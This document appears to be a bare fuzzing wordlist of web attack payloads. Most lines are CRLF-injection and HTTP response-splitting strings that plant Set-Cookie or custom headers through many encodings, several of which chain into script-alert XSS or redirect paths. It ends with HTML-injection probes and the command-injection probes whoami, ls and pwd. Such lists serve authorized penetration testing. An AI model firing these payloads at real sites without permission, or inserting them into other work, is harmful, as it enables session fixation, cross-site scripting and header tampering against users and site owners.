/%23%0aSet-Cookie:crlf=rahul
/%23%0aSet-Cookie:crlf=rahul
%23%0D%0AHeader-rahul:rahul
/%23%0d%0aSet-Cookie:crlf=rahul
/%23%0d%0aSet-Cookie:crlf=rahul
%23%0DHeader-rahul:rahul
/%23%0dSet-Cookie:crlf=rahul
/%23%0dSet-Cookie:crlf=rahul
%23%OAHeader-rahul:rahul
%250AHeader-rahul:rahul
/%250aSet-Cookie:crlf=rahul
/%250aSet-Cookie:crlf=rahul
%25250AHeader-rahul:rahul
/%25250aSet-Cookie:crlf=rahul
/%25250aSet-Cookie:crlf=rahul
%25%30%61Header-rahul:rahul
/%25%30%61Set-Cookie:crlf=rahul
/%25%30%61Set-Cookie:crlf=rahul
%25%30AHeader-rahul:rahul
/%25%30aSet-Cookie:crlf=rahul
/%25%30aSet-Cookie:crlf=rahul
/%2e%2e%2f%0d%0aSet-Cookie:crlf=rahul
/%2e%2e%2f%0d%0aSet-Cookie:crlf=rahul
/%2F..%0d%0aSet-Cookie:crlf=rahul
/%2F..%0d%0aSet-Cookie:crlf=rahul
/%2f%2e%2e%0d%0aSet-Cookie:crlf=rahul
/%2f%2e%2e%0d%0aSet-Cookie:crlf=rahul
/%2F%2E%2E%0D%0ASet-Cookie:whoami=rahul
%3F%0AHeader-rahul:rahul
%3F%0D%0AHeader-rahul:rahul
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28rahul%29%3C/script%3E
/%3f%0d%0aSet-Cookie:crlf=rahul
/%3f%0d%0aSet-Cookie:crlf=rahul
%3F%0DHeader-rahul:rahul
/%3f%0dSet-Cookie:crlf=rahul
/%3f%0dSet-Cookie:crlf=rahul
/%5Cr%20Set-Cookie:rahul=hi;
/%5Cr%5Cn%20Set-Cookie:rahul=hi;
/%5Cr%5Cn%5CtSet-Cookie:rahul%5Cr%5CtSet-Cookie:rahul=hi;
/%5Cr%5Cn%5CtSet-Cookie:rahul=hi;
%5cr%5cnHeader-rahul:rahul
/%5Cr%5CnSet-Cookie:rahul=hi;
/%5Cr%5CtSet-Cookie:rahul=hi;
/%5CrSet-Cookie:rahul=hi;
crlf%0A%20Header-rahul:rahul
crlf%0AHeader-rahul:rahul
crlf%0D%0A%09Header-rahul:rahul
crlf%0D%0A%20Header-rahul:rahul
crlf%0D%0AHeader-rahul:rahul
crlf%0D%20Header-rahul:rahul
crlf%0DHeader-rahul:rahul
crlf%20%0AHeader-rahul:rahul
crlf%20%0D%0AHeader-rahul:rahul
crlf%20%0DHeader-rahul:rahul
crlf%23%0AHeader-rahul:rahul
crlf%23%0D%0AHeader-rahul:rahul
crlf%23%0DHeader-rahul:rahul
crlf%23%OAHeader-rahul:rahul
crlf%3F%0AHeader-rahul:rahul
crlf%3F%0D%0AHeader-rahul:rahul
crlf%3F%0DHeader-rahul:rahul
crlf%5cr%5cnHeader-rahul:rahul
crlf%E5%98%8A%E5%98%8D%0AHeader-rahul:rahul
crlf%E5%98%8A%E5%98%8D%0D%0AHeader-rahul:rahul
crlf%E5%98%8A%E5%98%8D%0DHeader-rahul:rahul
crlf%E5%98%8A%E5%98%8DHeader-rahul:rahul
crlf\r\nHeader-rahul:rahul
%E5%98%8A%E5%98%8D%0AHeader-rahul:rahul
%E5%98%8A%E5%98%8D%0D%0AHeader-rahul:rahul
/%E5%98%8A%E5%98%8D%0D%0ASet-Cookie:rahul=hi;
%E5%98%8A%E5%98%8D%0DHeader-rahul:rahul
%E5%98%8A%E5%98%8DHeader-rahul:rahul
/%E5%98%8D%E5%98%8ASet-Cookie:rahul=hi
/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=rahul
/%E5%98%8D%E5%98%8ASet-Cookie:crlf=rahul
/%E5%98%8D%E5%98%8ASet-Cookie:crlf=rahul;
/%E5%98%8D%E5%98%8ASet-Cookie:crlfrahul=rahul
/%E5%98%8D%E5%98%8ASet-Cookie:rahul=rahul
/%E5%98%8D%E5%98%8ASet-Cookie:whoami=rahul%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE
/google.com/%2F..%0D%0AHeader-rahul:rahul
/\r%20Set-Cookie:rahul=hi;
/\r\n%20Set-Cookie:rahul=hi;
 \r\n Header-rahul:rahul
\r\n Header-rahul:rahul
\r\nHeader-rahul:rahul
\r\nHost: {{Hostname}}\r\nCookie: rahul=hi\r\n\r\nHTTP/1.1 200 OK\r\nSet-Cookie: rahul=hi\r\n\r\n
/\r\nSet-Cookie:rahul=hi;
/\r\n\tSet-Cookie:rahul=hi;
/\rSet-Cookie:rahul=hi;
/\r\tSet-Cookie:rahul=hi;
%u000AHeader-rahul:rahul
/%u000aSet-Cookie:crlf=rahul
/%u000aSet-Cookie:crlf=rahul
/%u000ASet-Cookie:rahul=hi;
/www.google.com/%2E%2E%2F%0D%0AHeader-rahul:rahul
//www.google.com/%2F%2E%2E%0D%0AHeader-rahul:rahul
/嘍嘊Set-Cookie:whoami=rahul嘍嘊嘍嘊嘍嘊<script>alert(1);</script>
/嘍嘊Set-Cookie:whoami=rahul嘍嘊嘍嘊嘍嘊嘼script嘾alert(1);嘼/script嘾
<a href="https://www.google.com">HTML rahul</a>
<abbr title="HTML rahul">HTML</abbr>
<iframe src="https://www.google.com" title="test rahul"></iframe>
<address>address,address rahul</address>
<audio controls><source src="demo.ogg" type="audio/ogg"><source src="demo.mp3" type="audio/mpeg">rahul</audio>
<b>rahul</b>
<h1>rahul</h1>
<h2>rahul</h2>
whoami
ls
pwd
